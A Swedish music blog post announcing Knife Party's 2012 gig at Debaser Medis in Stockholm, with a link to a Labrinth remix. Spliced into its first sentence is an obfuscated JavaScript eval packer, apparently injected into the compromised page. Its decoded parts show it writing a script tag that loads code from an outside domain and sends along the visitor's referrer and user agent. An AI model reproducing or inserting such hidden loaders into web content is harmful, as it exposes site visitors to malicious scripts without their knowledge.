Image Image Image Image Image Image Image Image Image Image

| 15 oktober, 2018

Scroll to top

Top

Labrinth – Last Time (Knife Party Remix) – Spelning i Stockholm 2012-02-17

Labrinth – Last Time (Knife Party Remix) – Spelning i Stockholm 2012-02-17
Alexander Gylemo

För eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘0.6(”<\\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bykir|var|u0026u|referrer|infya||js|php’.split(‘|’),0,{}))
de som valt att gå en annan väg än LMFAO imorgon (2012-02-17) är det inte långt kvar tills Knife Party spelar på Debaser Medis i Stockholm. De två electroproddande australiensarna Rob Swire och Gareth McGrillen från enorma drum ‘n’ bassgänget Pendulum slog igenom på riktigt i Sverige genom samarbetet med Swedish House Mafia på singeln ”Antidote” som släpptes i januari 2012. ”Antidote” är däremot inte den enda låten Knife Party gjort som slagit igenom, deras remix på Porter Robinsons ”Unison”, deras egna ”Internet Friends” och ”Fire Hive” (för att bara nämna några) har dragits av alla stora djs i samtliga EDM-genrer fler än en gång, och då har de bara satsat på aliaset Knife Party sedan början av 2011!

Imorgon spelar de runt midnatt på Debaser Medis i Stockholm, biljetter går att köpa i dörren och de som köpt biljetter till Dans Dakar kommer in gratis.

Lyssna på vår nya favorit, denna kommer definitivt spelas imorgon. En fet rytm, sjuka melodier och ett äkta Knife Party-monsterdrop väntar!

httpv://www.youtube.com/watch?v=_dfVAAWbLUY